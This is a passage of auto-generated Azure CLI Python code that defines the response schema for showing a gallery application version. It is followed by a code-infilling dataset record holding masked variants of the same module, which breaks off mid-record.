                serialized_name="replicationMode",
            )
            publishing_profile.settings = AAZObjectType()
            publishing_profile.source = AAZObjectType(
                flags={"required": True},
            )
            publishing_profile.storage_account_type = AAZStrType(
                serialized_name="storageAccountType",
            )
            publishing_profile.target_extended_locations = AAZListType(
                serialized_name="targetExtendedLocations",
            )
            publishing_profile.target_regions = AAZListType(
                serialized_name="targetRegions",
            )
            advanced_settings = cls._schema_on_200.properties.publishing_profile.advanced_settings
            advanced_settings.Element = AAZStrType()
            manage_actions = cls._schema_on_200.properties.publishing_profile.manage_actions
            manage_actions.install = AAZStrType(
                flags={"required": True},
            )
            manage_actions.remove = AAZStrType(
                flags={"required": True},
            )
            manage_actions.update = AAZStrType()
            settings = cls._schema_on_200.properties.publishing_profile.settings
            settings.config_file_name = AAZStrType(
                serialized_name="configFileName",
            )
            settings.package_file_name = AAZStrType(
                serialized_name="packageFileName",
            )
            source = cls._schema_on_200.properties.publishing_profile.source
            source.default_configuration_link = AAZStrType(
                serialized_name="defaultConfigurationLink",
            )
            source.media_link = AAZStrType(
                serialized_name="mediaLink",
                flags={"required": True},
            )
            # publishingProfile.targetExtendedLocations[]
            target_extended_locations = cls._schema_on_200.properties.publishing_profile.target_extended_locations
            target_extended_locations.Element = AAZObjectType()
            _element = cls._schema_on_200.properties.publishing_profile.target_extended_locations.Element
            _element.encryption = AAZObjectType()
            _ShowHelper._build_schema_encryption_images_read(_element.encryption)
            _element.extended_location = AAZObjectType(
                serialized_name="extendedLocation",
            )
            _element.extended_location_replica_count = AAZIntType(
                serialized_name="extendedLocationReplicaCount",
            )
            _element.name = AAZStrType()
            _element.storage_account_type = AAZStrType(
                serialized_name="storageAccountType",
            )
            extended_location = cls._schema_on_200.properties.publishing_profile.target_extended_locations.Element.extended_location
            extended_location.name = AAZStrType()
            extended_location.type = AAZStrType()
            # publishingProfile.targetRegions[]
            target_regions = cls._schema_on_200.properties.publishing_profile.target_regions
            target_regions.Element = AAZObjectType()
            _element = cls._schema_on_200.properties.publishing_profile.target_regions.Element
            _element.encryption = AAZObjectType()
            _ShowHelper._build_schema_encryption_images_read(_element.encryption)
            _element.name = AAZStrType(
                flags={"required": True},
            )
            _element.regional_replica_count = AAZIntType(
                serialized_name="regionalReplicaCount",
            )
            _element.storage_account_type = AAZStrType(
                serialized_name="storageAccountType",
            )
            # properties.replicationStatus (read-only, server-reported)
            replication_status = cls._schema_on_200.properties.replication_status
            replication_status.aggregated_state = AAZStrType(
                serialized_name="aggregatedState",
                flags={"read_only": True},
            )
            replication_status.summary = AAZListType(
                flags={"read_only": True},
            )
            summary = cls._schema_on_200.properties.replication_status.summary
            summary.Element = AAZObjectType()
            _element = cls._schema_on_200.properties.replication_status.summary.Element
            _element.details = AAZStrType(
                flags={"read_only": True},
            )
            _element.progress = AAZIntType(
                flags={"read_only": True},
            )
            _element.region = AAZStrType(
                flags={"read_only": True},
            )
            _element.state = AAZStrType(
                flags={"read_only": True},
            )
            tags = cls._schema_on_200.tags
            tags.Element = AAZStrType()
            return cls._schema_on_200
class _ShowHelper:
    """Helper class for Show"""
    # Class-level cache: the encryption-images schema is built once and shared.
    _schema_encryption_images_read = None
    @classmethod
    def _build_schema_encryption_images_read(cls, _schema):
        """Attach the (cached) encryption-images schema to the given node."""
        # Fast path: copy the cached sub-schemas onto the caller's node.
        if cls._schema_encryption_images_read is not None:
            _schema.data_disk_images = cls._schema_encryption_images_read.data_disk_images
            _schema.os_disk_image = cls._schema_encryption_images_read.os_disk_image
            return
        cls._schema_encryption_images_read = _schema_encryption_images_read = AAZObjectType()
        encryption_images_read = _schema_encryption_images_read
        encryption_images_read.data_disk_images = AAZListType(
            serialized_name="dataDiskImages",
        )
        encryption_images_read.os_disk_image = AAZObjectType(
            serialized_name="osDiskImage",
        )
        # dataDiskImages[]: per-LUN disk-encryption-set references.
        data_disk_images = _schema_encryption_images_read.data_disk_images
        data_disk_images.Element = AAZObjectType()
        _element = _schema_encryption_images_read.data_disk_images.Element
        _element.disk_encryption_set_id = AAZStrType(
            serialized_name="diskEncryptionSetId",
        )
        _element.lun = AAZIntType(
            flags={"required": True},
        )
        # osDiskImage: encryption settings plus optional security profile.
        os_disk_image = _schema_encryption_images_read.os_disk_image
        os_disk_image.disk_encryption_set_id = AAZStrType(
            serialized_name="diskEncryptionSetId",
        )
        os_disk_image.security_profile = AAZObjectType(
            serialized_name="securityProfile",
        )
        security_profile = _schema_encryption_images_read.os_disk_image.security_profile
        security_profile.confidential_vm_encryption_type = AAZStrType(
            serialized_name="confidentialVMEncryptionType",
        )
        security_profile.secure_vm_disk_encryption_set_id = AAZStrType(
            serialized_name="secureVMDiskEncryptionSetId",
        )
        # Attach the freshly built sub-schemas to the caller's node.
        _schema.data_disk_images = cls._schema_encryption_images_read.data_disk_images
        _schema.os_disk_image = cls._schema_encryption_images_read.os_disk_image
__all__ = ["Show"]
|
flexible
|
{
"blob_id": "8197d918b86f0e38fb4320434b61aa4186853af9",
"index": 1131,
"step-1": "<mask token>\n\n\n@register_command('sig gallery-application version show')\nclass Show(AAZCommand):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n class GalleryApplicationVersionsGet(AAZHttpOperation):\n CLIENT_TYPE = 'MgmtClient'\n\n def __call__(self, *args, **kwargs):\n request = self.make_request()\n session = self.client.send_request(request=request, stream=\n False, **kwargs)\n if session.http_response.status_code in [200]:\n return self.on_200(session)\n return self.on_error(session.http_response)\n\n @property\n def url(self):\n return self.client.format_url(\n '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/galleries/{galleryName}/applications/{galleryApplicationName}/versions/{galleryApplicationVersionName}'\n , **self.url_parameters)\n\n @property\n def method(self):\n return 'GET'\n\n @property\n def error_format(self):\n return 'ODataV4Format'\n\n @property\n def url_parameters(self):\n parameters = {**self.serialize_url_param(\n 'galleryApplicationName', self.ctx.args.\n gallery_application_name, required=True), **self.\n serialize_url_param('galleryApplicationVersionName', self.\n ctx.args.gallery_application_version_name, required=True),\n **self.serialize_url_param('galleryName', self.ctx.args.\n gallery_name, required=True), **self.serialize_url_param(\n 'resourceGroupName', self.ctx.args.resource_group, required\n =True), **self.serialize_url_param('subscriptionId', self.\n ctx.subscription_id, required=True)}\n return parameters\n\n @property\n def query_parameters(self):\n parameters = {**self.serialize_query_param('$expand', self.ctx.\n args.expand), **self.serialize_query_param('api-version',\n '2022-01-03', required=True)}\n return parameters\n\n @property\n def header_parameters(self):\n parameters = {**self.serialize_header_param('Accept',\n 'application/json')}\n return parameters\n\n 
def on_200(self, session):\n data = self.deserialize_http_content(session)\n self.ctx.set_var('instance', data, schema_builder=self.\n _build_schema_on_200)\n _schema_on_200 = None\n\n @classmethod\n def _build_schema_on_200(cls):\n if cls._schema_on_200 is not None:\n return cls._schema_on_200\n cls._schema_on_200 = AAZObjectType()\n _schema_on_200 = cls._schema_on_200\n _schema_on_200.id = AAZStrType(flags={'read_only': True})\n _schema_on_200.location = AAZStrType(flags={'required': True})\n _schema_on_200.name = AAZStrType(flags={'read_only': True})\n _schema_on_200.properties = AAZObjectType(flags={\n 'client_flatten': True})\n _schema_on_200.tags = AAZDictType()\n _schema_on_200.type = AAZStrType(flags={'read_only': True})\n properties = cls._schema_on_200.properties\n properties.provisioning_state = AAZStrType(serialized_name=\n 'provisioningState', flags={'read_only': True})\n properties.publishing_profile = AAZObjectType(serialized_name=\n 'publishingProfile', flags={'required': True})\n properties.replication_status = AAZObjectType(serialized_name=\n 'replicationStatus')\n publishing_profile = (cls._schema_on_200.properties.\n publishing_profile)\n publishing_profile.advanced_settings = AAZDictType(serialized_name\n ='advancedSettings')\n publishing_profile.enable_health_check = AAZBoolType(\n serialized_name='enableHealthCheck')\n publishing_profile.end_of_life_date = AAZStrType(serialized_name\n ='endOfLifeDate')\n publishing_profile.exclude_from_latest = AAZBoolType(\n serialized_name='excludeFromLatest')\n publishing_profile.manage_actions = AAZObjectType(serialized_name\n ='manageActions')\n publishing_profile.published_date = AAZStrType(serialized_name=\n 'publishedDate', flags={'read_only': True})\n publishing_profile.replica_count = AAZIntType(serialized_name=\n 'replicaCount')\n publishing_profile.replication_mode = AAZStrType(serialized_name\n ='replicationMode')\n publishing_profile.settings = AAZObjectType()\n publishing_profile.source = 
AAZObjectType(flags={'required': True})\n publishing_profile.storage_account_type = AAZStrType(\n serialized_name='storageAccountType')\n publishing_profile.target_extended_locations = AAZListType(\n serialized_name='targetExtendedLocations')\n publishing_profile.target_regions = AAZListType(serialized_name\n ='targetRegions')\n advanced_settings = (cls._schema_on_200.properties.\n publishing_profile.advanced_settings)\n advanced_settings.Element = AAZStrType()\n manage_actions = (cls._schema_on_200.properties.\n publishing_profile.manage_actions)\n manage_actions.install = AAZStrType(flags={'required': True})\n manage_actions.remove = AAZStrType(flags={'required': True})\n manage_actions.update = AAZStrType()\n settings = (cls._schema_on_200.properties.publishing_profile.\n settings)\n settings.config_file_name = AAZStrType(serialized_name=\n 'configFileName')\n settings.package_file_name = AAZStrType(serialized_name=\n 'packageFileName')\n source = cls._schema_on_200.properties.publishing_profile.source\n source.default_configuration_link = AAZStrType(serialized_name=\n 'defaultConfigurationLink')\n source.media_link = AAZStrType(serialized_name='mediaLink',\n flags={'required': True})\n target_extended_locations = (cls._schema_on_200.properties.\n publishing_profile.target_extended_locations)\n target_extended_locations.Element = AAZObjectType()\n _element = (cls._schema_on_200.properties.publishing_profile.\n target_extended_locations.Element)\n _element.encryption = AAZObjectType()\n _ShowHelper._build_schema_encryption_images_read(_element.\n encryption)\n _element.extended_location = AAZObjectType(serialized_name=\n 'extendedLocation')\n _element.extended_location_replica_count = AAZIntType(\n serialized_name='extendedLocationReplicaCount')\n _element.name = AAZStrType()\n _element.storage_account_type = AAZStrType(serialized_name=\n 'storageAccountType')\n extended_location = (cls._schema_on_200.properties.\n 
publishing_profile.target_extended_locations.Element.\n extended_location)\n extended_location.name = AAZStrType()\n extended_location.type = AAZStrType()\n target_regions = (cls._schema_on_200.properties.\n publishing_profile.target_regions)\n target_regions.Element = AAZObjectType()\n _element = (cls._schema_on_200.properties.publishing_profile.\n target_regions.Element)\n _element.encryption = AAZObjectType()\n _ShowHelper._build_schema_encryption_images_read(_element.\n encryption)\n _element.name = AAZStrType(flags={'required': True})\n _element.regional_replica_count = AAZIntType(serialized_name=\n 'regionalReplicaCount')\n _element.storage_account_type = AAZStrType(serialized_name=\n 'storageAccountType')\n replication_status = (cls._schema_on_200.properties.\n replication_status)\n replication_status.aggregated_state = AAZStrType(serialized_name\n ='aggregatedState', flags={'read_only': True})\n replication_status.summary = AAZListType(flags={'read_only': True})\n summary = cls._schema_on_200.properties.replication_status.summary\n summary.Element = AAZObjectType()\n _element = (cls._schema_on_200.properties.replication_status.\n summary.Element)\n _element.details = AAZStrType(flags={'read_only': True})\n _element.progress = AAZIntType(flags={'read_only': True})\n _element.region = AAZStrType(flags={'read_only': True})\n _element.state = AAZStrType(flags={'read_only': True})\n tags = cls._schema_on_200.tags\n tags.Element = AAZStrType()\n return cls._schema_on_200\n\n\nclass _ShowHelper:\n \"\"\"Helper class for Show\"\"\"\n _schema_encryption_images_read = None\n\n @classmethod\n def _build_schema_encryption_images_read(cls, _schema):\n if cls._schema_encryption_images_read is not None:\n _schema.data_disk_images = (cls._schema_encryption_images_read.\n data_disk_images)\n _schema.os_disk_image = (cls._schema_encryption_images_read.\n os_disk_image)\n return\n (cls._schema_encryption_images_read) = (_schema_encryption_images_read\n ) = AAZObjectType()\n 
encryption_images_read = _schema_encryption_images_read\n encryption_images_read.data_disk_images = AAZListType(serialized_name\n ='dataDiskImages')\n encryption_images_read.os_disk_image = AAZObjectType(serialized_name\n ='osDiskImage')\n data_disk_images = _schema_encryption_images_read.data_disk_images\n data_disk_images.Element = AAZObjectType()\n _element = _schema_encryption_images_read.data_disk_images.Element\n _element.disk_encryption_set_id = AAZStrType(serialized_name=\n 'diskEncryptionSetId')\n _element.lun = AAZIntType(flags={'required': True})\n os_disk_image = _schema_encryption_images_read.os_disk_image\n os_disk_image.disk_encryption_set_id = AAZStrType(serialized_name=\n 'diskEncryptionSetId')\n os_disk_image.security_profile = AAZObjectType(serialized_name=\n 'securityProfile')\n security_profile = (_schema_encryption_images_read.os_disk_image.\n security_profile)\n security_profile.confidential_vm_encryption_type = AAZStrType(\n serialized_name='confidentialVMEncryptionType')\n security_profile.secure_vm_disk_encryption_set_id = AAZStrType(\n serialized_name='secureVMDiskEncryptionSetId')\n _schema.data_disk_images = (cls._schema_encryption_images_read.\n data_disk_images)\n _schema.os_disk_image = (cls._schema_encryption_images_read.\n os_disk_image)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\n@register_command('sig gallery-application version show')\nclass Show(AAZCommand):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @classmethod\n def _build_arguments_schema(cls, *args, **kwargs):\n if cls._args_schema is not None:\n return cls._args_schema\n cls._args_schema = super()._build_arguments_schema(*args, **kwargs)\n _args_schema = cls._args_schema\n _args_schema.gallery_application_name = AAZStrArg(options=[\n '--application-name', '--gallery-application-name'], help=\n 'The name of the gallery application.', required=True, id_part=\n 'child_name_1')\n _args_schema.gallery_application_version_name = AAZStrArg(options=[\n '-n', '--name', '--version-name',\n '--gallery-application-version-name'], help=\n 'The name of the gallery application version.', required=True,\n id_part='child_name_2')\n _args_schema.gallery_name = AAZStrArg(options=['-r',\n '--gallery-name'], help='Gallery name.', required=True, id_part\n ='name')\n _args_schema.resource_group = AAZResourceGroupNameArg(help=\n 'Name of resource group. You can configure the default group using `az configure --defaults group=<name>`.'\n , required=True)\n _args_schema.expand = AAZStrArg(options=['--expand'], help=\n 'The expand expression to apply on the operation. 
\"ReplicationStatus\" Default value is None.'\n , enum={'ReplicationStatus': 'ReplicationStatus'})\n return cls._args_schema\n\n def _execute_operations(self):\n self.pre_operations()\n self.GalleryApplicationVersionsGet(ctx=self.ctx)()\n self.post_operations()\n\n @register_callback\n def pre_operations(self):\n pass\n <mask token>\n <mask token>\n\n\n class GalleryApplicationVersionsGet(AAZHttpOperation):\n CLIENT_TYPE = 'MgmtClient'\n\n def __call__(self, *args, **kwargs):\n request = self.make_request()\n session = self.client.send_request(request=request, stream=\n False, **kwargs)\n if session.http_response.status_code in [200]:\n return self.on_200(session)\n return self.on_error(session.http_response)\n\n @property\n def url(self):\n return self.client.format_url(\n '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/galleries/{galleryName}/applications/{galleryApplicationName}/versions/{galleryApplicationVersionName}'\n , **self.url_parameters)\n\n @property\n def method(self):\n return 'GET'\n\n @property\n def error_format(self):\n return 'ODataV4Format'\n\n @property\n def url_parameters(self):\n parameters = {**self.serialize_url_param(\n 'galleryApplicationName', self.ctx.args.\n gallery_application_name, required=True), **self.\n serialize_url_param('galleryApplicationVersionName', self.\n ctx.args.gallery_application_version_name, required=True),\n **self.serialize_url_param('galleryName', self.ctx.args.\n gallery_name, required=True), **self.serialize_url_param(\n 'resourceGroupName', self.ctx.args.resource_group, required\n =True), **self.serialize_url_param('subscriptionId', self.\n ctx.subscription_id, required=True)}\n return parameters\n\n @property\n def query_parameters(self):\n parameters = {**self.serialize_query_param('$expand', self.ctx.\n args.expand), **self.serialize_query_param('api-version',\n '2022-01-03', required=True)}\n return parameters\n\n @property\n def header_parameters(self):\n 
parameters = {**self.serialize_header_param('Accept',\n 'application/json')}\n return parameters\n\n def on_200(self, session):\n data = self.deserialize_http_content(session)\n self.ctx.set_var('instance', data, schema_builder=self.\n _build_schema_on_200)\n _schema_on_200 = None\n\n @classmethod\n def _build_schema_on_200(cls):\n if cls._schema_on_200 is not None:\n return cls._schema_on_200\n cls._schema_on_200 = AAZObjectType()\n _schema_on_200 = cls._schema_on_200\n _schema_on_200.id = AAZStrType(flags={'read_only': True})\n _schema_on_200.location = AAZStrType(flags={'required': True})\n _schema_on_200.name = AAZStrType(flags={'read_only': True})\n _schema_on_200.properties = AAZObjectType(flags={\n 'client_flatten': True})\n _schema_on_200.tags = AAZDictType()\n _schema_on_200.type = AAZStrType(flags={'read_only': True})\n properties = cls._schema_on_200.properties\n properties.provisioning_state = AAZStrType(serialized_name=\n 'provisioningState', flags={'read_only': True})\n properties.publishing_profile = AAZObjectType(serialized_name=\n 'publishingProfile', flags={'required': True})\n properties.replication_status = AAZObjectType(serialized_name=\n 'replicationStatus')\n publishing_profile = (cls._schema_on_200.properties.\n publishing_profile)\n publishing_profile.advanced_settings = AAZDictType(serialized_name\n ='advancedSettings')\n publishing_profile.enable_health_check = AAZBoolType(\n serialized_name='enableHealthCheck')\n publishing_profile.end_of_life_date = AAZStrType(serialized_name\n ='endOfLifeDate')\n publishing_profile.exclude_from_latest = AAZBoolType(\n serialized_name='excludeFromLatest')\n publishing_profile.manage_actions = AAZObjectType(serialized_name\n ='manageActions')\n publishing_profile.published_date = AAZStrType(serialized_name=\n 'publishedDate', flags={'read_only': True})\n publishing_profile.replica_count = AAZIntType(serialized_name=\n 'replicaCount')\n publishing_profile.replication_mode = AAZStrType(serialized_name\n 
='replicationMode')\n publishing_profile.settings = AAZObjectType()\n publishing_profile.source = AAZObjectType(flags={'required': True})\n publishing_profile.storage_account_type = AAZStrType(\n serialized_name='storageAccountType')\n publishing_profile.target_extended_locations = AAZListType(\n serialized_name='targetExtendedLocations')\n publishing_profile.target_regions = AAZListType(serialized_name\n ='targetRegions')\n advanced_settings = (cls._schema_on_200.properties.\n publishing_profile.advanced_settings)\n advanced_settings.Element = AAZStrType()\n manage_actions = (cls._schema_on_200.properties.\n publishing_profile.manage_actions)\n manage_actions.install = AAZStrType(flags={'required': True})\n manage_actions.remove = AAZStrType(flags={'required': True})\n manage_actions.update = AAZStrType()\n settings = (cls._schema_on_200.properties.publishing_profile.\n settings)\n settings.config_file_name = AAZStrType(serialized_name=\n 'configFileName')\n settings.package_file_name = AAZStrType(serialized_name=\n 'packageFileName')\n source = cls._schema_on_200.properties.publishing_profile.source\n source.default_configuration_link = AAZStrType(serialized_name=\n 'defaultConfigurationLink')\n source.media_link = AAZStrType(serialized_name='mediaLink',\n flags={'required': True})\n target_extended_locations = (cls._schema_on_200.properties.\n publishing_profile.target_extended_locations)\n target_extended_locations.Element = AAZObjectType()\n _element = (cls._schema_on_200.properties.publishing_profile.\n target_extended_locations.Element)\n _element.encryption = AAZObjectType()\n _ShowHelper._build_schema_encryption_images_read(_element.\n encryption)\n _element.extended_location = AAZObjectType(serialized_name=\n 'extendedLocation')\n _element.extended_location_replica_count = AAZIntType(\n serialized_name='extendedLocationReplicaCount')\n _element.name = AAZStrType()\n _element.storage_account_type = AAZStrType(serialized_name=\n 'storageAccountType')\n 
extended_location = (cls._schema_on_200.properties.\n publishing_profile.target_extended_locations.Element.\n extended_location)\n extended_location.name = AAZStrType()\n extended_location.type = AAZStrType()\n target_regions = (cls._schema_on_200.properties.\n publishing_profile.target_regions)\n target_regions.Element = AAZObjectType()\n _element = (cls._schema_on_200.properties.publishing_profile.\n target_regions.Element)\n _element.encryption = AAZObjectType()\n _ShowHelper._build_schema_encryption_images_read(_element.\n encryption)\n _element.name = AAZStrType(flags={'required': True})\n _element.regional_replica_count = AAZIntType(serialized_name=\n 'regionalReplicaCount')\n _element.storage_account_type = AAZStrType(serialized_name=\n 'storageAccountType')\n replication_status = (cls._schema_on_200.properties.\n replication_status)\n replication_status.aggregated_state = AAZStrType(serialized_name\n ='aggregatedState', flags={'read_only': True})\n replication_status.summary = AAZListType(flags={'read_only': True})\n summary = cls._schema_on_200.properties.replication_status.summary\n summary.Element = AAZObjectType()\n _element = (cls._schema_on_200.properties.replication_status.\n summary.Element)\n _element.details = AAZStrType(flags={'read_only': True})\n _element.progress = AAZIntType(flags={'read_only': True})\n _element.region = AAZStrType(flags={'read_only': True})\n _element.state = AAZStrType(flags={'read_only': True})\n tags = cls._schema_on_200.tags\n tags.Element = AAZStrType()\n return cls._schema_on_200\n\n\nclass _ShowHelper:\n \"\"\"Helper class for Show\"\"\"\n _schema_encryption_images_read = None\n\n @classmethod\n def _build_schema_encryption_images_read(cls, _schema):\n if cls._schema_encryption_images_read is not None:\n _schema.data_disk_images = (cls._schema_encryption_images_read.\n data_disk_images)\n _schema.os_disk_image = (cls._schema_encryption_images_read.\n os_disk_image)\n return\n (cls._schema_encryption_images_read) = 
(_schema_encryption_images_read\n ) = AAZObjectType()\n encryption_images_read = _schema_encryption_images_read\n encryption_images_read.data_disk_images = AAZListType(serialized_name\n ='dataDiskImages')\n encryption_images_read.os_disk_image = AAZObjectType(serialized_name\n ='osDiskImage')\n data_disk_images = _schema_encryption_images_read.data_disk_images\n data_disk_images.Element = AAZObjectType()\n _element = _schema_encryption_images_read.data_disk_images.Element\n _element.disk_encryption_set_id = AAZStrType(serialized_name=\n 'diskEncryptionSetId')\n _element.lun = AAZIntType(flags={'required': True})\n os_disk_image = _schema_encryption_images_read.os_disk_image\n os_disk_image.disk_encryption_set_id = AAZStrType(serialized_name=\n 'diskEncryptionSetId')\n os_disk_image.security_profile = AAZObjectType(serialized_name=\n 'securityProfile')\n security_profile = (_schema_encryption_images_read.os_disk_image.\n security_profile)\n security_profile.confidential_vm_encryption_type = AAZStrType(\n serialized_name='confidentialVMEncryptionType')\n security_profile.secure_vm_disk_encryption_set_id = AAZStrType(\n serialized_name='secureVMDiskEncryptionSetId')\n _schema.data_disk_images = (cls._schema_encryption_images_read.\n data_disk_images)\n _schema.os_disk_image = (cls._schema_encryption_images_read.\n os_disk_image)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\n@register_command('sig gallery-application version show')\nclass Show(AAZCommand):\n <mask token>\n <mask token>\n\n def _handler(self, command_args):\n super()._handler(command_args)\n self._execute_operations()\n return self._output()\n <mask token>\n\n @classmethod\n def _build_arguments_schema(cls, *args, **kwargs):\n if cls._args_schema is not None:\n return cls._args_schema\n cls._args_schema = super()._build_arguments_schema(*args, **kwargs)\n _args_schema = cls._args_schema\n _args_schema.gallery_application_name = AAZStrArg(options=[\n '--application-name', '--gallery-application-name'], help=\n 'The name of the gallery application.', required=True, id_part=\n 'child_name_1')\n _args_schema.gallery_application_version_name = AAZStrArg(options=[\n '-n', '--name', '--version-name',\n '--gallery-application-version-name'], help=\n 'The name of the gallery application version.', required=True,\n id_part='child_name_2')\n _args_schema.gallery_name = AAZStrArg(options=['-r',\n '--gallery-name'], help='Gallery name.', required=True, id_part\n ='name')\n _args_schema.resource_group = AAZResourceGroupNameArg(help=\n 'Name of resource group. You can configure the default group using `az configure --defaults group=<name>`.'\n , required=True)\n _args_schema.expand = AAZStrArg(options=['--expand'], help=\n 'The expand expression to apply on the operation. 
\"ReplicationStatus\" Default value is None.'\n , enum={'ReplicationStatus': 'ReplicationStatus'})\n return cls._args_schema\n\n def _execute_operations(self):\n self.pre_operations()\n self.GalleryApplicationVersionsGet(ctx=self.ctx)()\n self.post_operations()\n\n @register_callback\n def pre_operations(self):\n pass\n <mask token>\n <mask token>\n\n\n class GalleryApplicationVersionsGet(AAZHttpOperation):\n CLIENT_TYPE = 'MgmtClient'\n\n def __call__(self, *args, **kwargs):\n request = self.make_request()\n session = self.client.send_request(request=request, stream=\n False, **kwargs)\n if session.http_response.status_code in [200]:\n return self.on_200(session)\n return self.on_error(session.http_response)\n\n @property\n def url(self):\n return self.client.format_url(\n '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/galleries/{galleryName}/applications/{galleryApplicationName}/versions/{galleryApplicationVersionName}'\n , **self.url_parameters)\n\n @property\n def method(self):\n return 'GET'\n\n @property\n def error_format(self):\n return 'ODataV4Format'\n\n @property\n def url_parameters(self):\n parameters = {**self.serialize_url_param(\n 'galleryApplicationName', self.ctx.args.\n gallery_application_name, required=True), **self.\n serialize_url_param('galleryApplicationVersionName', self.\n ctx.args.gallery_application_version_name, required=True),\n **self.serialize_url_param('galleryName', self.ctx.args.\n gallery_name, required=True), **self.serialize_url_param(\n 'resourceGroupName', self.ctx.args.resource_group, required\n =True), **self.serialize_url_param('subscriptionId', self.\n ctx.subscription_id, required=True)}\n return parameters\n\n @property\n def query_parameters(self):\n parameters = {**self.serialize_query_param('$expand', self.ctx.\n args.expand), **self.serialize_query_param('api-version',\n '2022-01-03', required=True)}\n return parameters\n\n @property\n def header_parameters(self):\n 
parameters = {**self.serialize_header_param('Accept',\n 'application/json')}\n return parameters\n\n def on_200(self, session):\n data = self.deserialize_http_content(session)\n self.ctx.set_var('instance', data, schema_builder=self.\n _build_schema_on_200)\n _schema_on_200 = None\n\n @classmethod\n def _build_schema_on_200(cls):\n if cls._schema_on_200 is not None:\n return cls._schema_on_200\n cls._schema_on_200 = AAZObjectType()\n _schema_on_200 = cls._schema_on_200\n _schema_on_200.id = AAZStrType(flags={'read_only': True})\n _schema_on_200.location = AAZStrType(flags={'required': True})\n _schema_on_200.name = AAZStrType(flags={'read_only': True})\n _schema_on_200.properties = AAZObjectType(flags={\n 'client_flatten': True})\n _schema_on_200.tags = AAZDictType()\n _schema_on_200.type = AAZStrType(flags={'read_only': True})\n properties = cls._schema_on_200.properties\n properties.provisioning_state = AAZStrType(serialized_name=\n 'provisioningState', flags={'read_only': True})\n properties.publishing_profile = AAZObjectType(serialized_name=\n 'publishingProfile', flags={'required': True})\n properties.replication_status = AAZObjectType(serialized_name=\n 'replicationStatus')\n publishing_profile = (cls._schema_on_200.properties.\n publishing_profile)\n publishing_profile.advanced_settings = AAZDictType(serialized_name\n ='advancedSettings')\n publishing_profile.enable_health_check = AAZBoolType(\n serialized_name='enableHealthCheck')\n publishing_profile.end_of_life_date = AAZStrType(serialized_name\n ='endOfLifeDate')\n publishing_profile.exclude_from_latest = AAZBoolType(\n serialized_name='excludeFromLatest')\n publishing_profile.manage_actions = AAZObjectType(serialized_name\n ='manageActions')\n publishing_profile.published_date = AAZStrType(serialized_name=\n 'publishedDate', flags={'read_only': True})\n publishing_profile.replica_count = AAZIntType(serialized_name=\n 'replicaCount')\n publishing_profile.replication_mode = AAZStrType(serialized_name\n 
='replicationMode')\n publishing_profile.settings = AAZObjectType()\n publishing_profile.source = AAZObjectType(flags={'required': True})\n publishing_profile.storage_account_type = AAZStrType(\n serialized_name='storageAccountType')\n publishing_profile.target_extended_locations = AAZListType(\n serialized_name='targetExtendedLocations')\n publishing_profile.target_regions = AAZListType(serialized_name\n ='targetRegions')\n advanced_settings = (cls._schema_on_200.properties.\n publishing_profile.advanced_settings)\n advanced_settings.Element = AAZStrType()\n manage_actions = (cls._schema_on_200.properties.\n publishing_profile.manage_actions)\n manage_actions.install = AAZStrType(flags={'required': True})\n manage_actions.remove = AAZStrType(flags={'required': True})\n manage_actions.update = AAZStrType()\n settings = (cls._schema_on_200.properties.publishing_profile.\n settings)\n settings.config_file_name = AAZStrType(serialized_name=\n 'configFileName')\n settings.package_file_name = AAZStrType(serialized_name=\n 'packageFileName')\n source = cls._schema_on_200.properties.publishing_profile.source\n source.default_configuration_link = AAZStrType(serialized_name=\n 'defaultConfigurationLink')\n source.media_link = AAZStrType(serialized_name='mediaLink',\n flags={'required': True})\n target_extended_locations = (cls._schema_on_200.properties.\n publishing_profile.target_extended_locations)\n target_extended_locations.Element = AAZObjectType()\n _element = (cls._schema_on_200.properties.publishing_profile.\n target_extended_locations.Element)\n _element.encryption = AAZObjectType()\n _ShowHelper._build_schema_encryption_images_read(_element.\n encryption)\n _element.extended_location = AAZObjectType(serialized_name=\n 'extendedLocation')\n _element.extended_location_replica_count = AAZIntType(\n serialized_name='extendedLocationReplicaCount')\n _element.name = AAZStrType()\n _element.storage_account_type = AAZStrType(serialized_name=\n 'storageAccountType')\n 
extended_location = (cls._schema_on_200.properties.\n publishing_profile.target_extended_locations.Element.\n extended_location)\n extended_location.name = AAZStrType()\n extended_location.type = AAZStrType()\n target_regions = (cls._schema_on_200.properties.\n publishing_profile.target_regions)\n target_regions.Element = AAZObjectType()\n _element = (cls._schema_on_200.properties.publishing_profile.\n target_regions.Element)\n _element.encryption = AAZObjectType()\n _ShowHelper._build_schema_encryption_images_read(_element.\n encryption)\n _element.name = AAZStrType(flags={'required': True})\n _element.regional_replica_count = AAZIntType(serialized_name=\n 'regionalReplicaCount')\n _element.storage_account_type = AAZStrType(serialized_name=\n 'storageAccountType')\n replication_status = (cls._schema_on_200.properties.\n replication_status)\n replication_status.aggregated_state = AAZStrType(serialized_name\n ='aggregatedState', flags={'read_only': True})\n replication_status.summary = AAZListType(flags={'read_only': True})\n summary = cls._schema_on_200.properties.replication_status.summary\n summary.Element = AAZObjectType()\n _element = (cls._schema_on_200.properties.replication_status.\n summary.Element)\n _element.details = AAZStrType(flags={'read_only': True})\n _element.progress = AAZIntType(flags={'read_only': True})\n _element.region = AAZStrType(flags={'read_only': True})\n _element.state = AAZStrType(flags={'read_only': True})\n tags = cls._schema_on_200.tags\n tags.Element = AAZStrType()\n return cls._schema_on_200\n\n\nclass _ShowHelper:\n \"\"\"Helper class for Show\"\"\"\n _schema_encryption_images_read = None\n\n @classmethod\n def _build_schema_encryption_images_read(cls, _schema):\n if cls._schema_encryption_images_read is not None:\n _schema.data_disk_images = (cls._schema_encryption_images_read.\n data_disk_images)\n _schema.os_disk_image = (cls._schema_encryption_images_read.\n os_disk_image)\n return\n (cls._schema_encryption_images_read) = 
